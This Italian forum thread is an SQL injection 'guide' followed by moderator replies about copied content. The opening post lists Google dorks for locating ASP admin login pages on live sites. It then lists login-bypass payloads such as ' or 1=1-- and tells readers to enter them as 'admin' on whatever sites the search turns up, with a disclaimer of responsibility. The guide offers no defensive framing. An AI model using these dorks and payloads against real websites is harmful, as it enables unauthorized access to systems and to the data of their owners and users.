• Regolamento Macrocategoria DEV
    Prima di aprire un topic nella Macrocategoria DEV, è bene leggerne il suo regolamento. Sei un'azienda o un hosting/provider? Qui sono anche contenute informazioni per collaborare con Sciax2 ed ottenere l'accredito nella nostra community!

Guida SQL Injection + Dorks

#MarshMallouJ-

Utente Esperto
Autore del topic
8 Settembre 2011
1.444
58
Miglior risposta
0
In informatica la SQL injection è una tecnica dell'hacking mirata a colpire le applicazioni web che si appoggiano su un database di tipo SQL. Questo exploit sfrutta l'inefficienza dei controlli sui dati ricevuti in input ed inserisce codice maligno all'interno di una query SQL. Le conseguenze prodotte sono imprevedibili per il programmatore: l'SQL injection permette al malintenzionato di autenticarsi con ampi privilegi in aree protette del sito anche senza essere in possesso delle credenziali d'accesso e di visualizzare e/o alterare dati sensibili.
| da Wikipedia

La sensibilità avviene in un codice del tipo:
<form action='login.php' method='post'>
Username: <input type='text' name='user' />
Password: <input type='password' name='pwd' />
<input type='submit' value='Login' />
</form>

Naturalmente,potremmo visualizzare l'HTML del form di Login di un sito,oppure possiamo hackare molti siti sensibili,la maggior parte di essi implementa un linguaggio in .asp di conseguenza possiamo fare così

Scriviamo su Google uno di questi Dork:

inurl:adminlogin.asp

inurl:admin_login.asp

inurl:adminlogon.asp

inurl:admin_logon.asp

inurl:/admin.asp

inurl:/login.asp

inurl:/logon.asp

inurl:/adminlogin.asp

inurl:/adminlogon.asp

inurl:/admin_login.asp

inurl:/admin_logon.asp

inurl:/admin/admin.asp

inurl:/admin/login.asp

inurl:/admin/logon.asp

inurl:/admin/adminlogin.asp

inurl:/admin/adminlogon.asp

inurl:/admin/admin_login.asp

inurl:/admin/admin_logon.asp

inurl:/administrator/admin.asp

inurl:/administrator/login.asp

inurl:/administrator/logon.asp

inurl:root/login.asp

inurl:admin/index.asp
-------------------------------------------------------------------------------------------------------------------
Clicchiamo su un sito (naturalmente esistono anche persone normali che proteggono il codice,di conseguenza non vi abbattete al primo tentativo) e nel form inseriamo queste informazioni.

Nella TextBox dove inserire l'ID dell'Administrator scrivete quello che trovate tra le virgolette: "admin"
Nella TextBox dove inserire la Password dell'admin scrivete una delle seguenti stringhe:

admin'--

1'or'1'='1

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a

1' OR '1'='1

FONTE:
Perfavore, Entra oppure Registrati per vedere i Link!


-------------------------------------------------------------------------------------------------------------------------------------------------------
Altre Guide:
http://www.sciax2.it/forum/hacking/guida-sommaria-allanonimato-totale-deep-web-bitcoin-527038.html
http://www.sciax2.it/forum/phrehacking/d-ricaricare-gratis-cellulare-527072.html#post3354228
-------------------------------------------------------------------------------------------------------------------------------------------------------
NB:Ne io ne Sciax2 Ci prendiamo le conseguenze di ciò che farete con questa guida

Alla Prossima Guida/Relase
 
Ultima modifica da un moderatore:
Riferimento: SQL Injection + Dorks

Si certo! Te lo dico l'ultima volta, inserisci la fonte!
 
Riferimento: SQL Injection + Dorks

Vai a prendere in giro qualcun altro. ;)

Infraziono per violazione dei diritti d'autore.
 
Riferimento: SQL Injection + Dorks

Ti ringrazio Walter,tu si che sai fare il tuo lavoro,ah e che ne dici di chiudere il topic,così posto la mia guida originale ?
 
Riferimento: SQL Injection + Dorks

No, dai non c'è bisogno, tanto ha fatto copia incolla, pari pari.
E poi c'è anche la fonte. ;)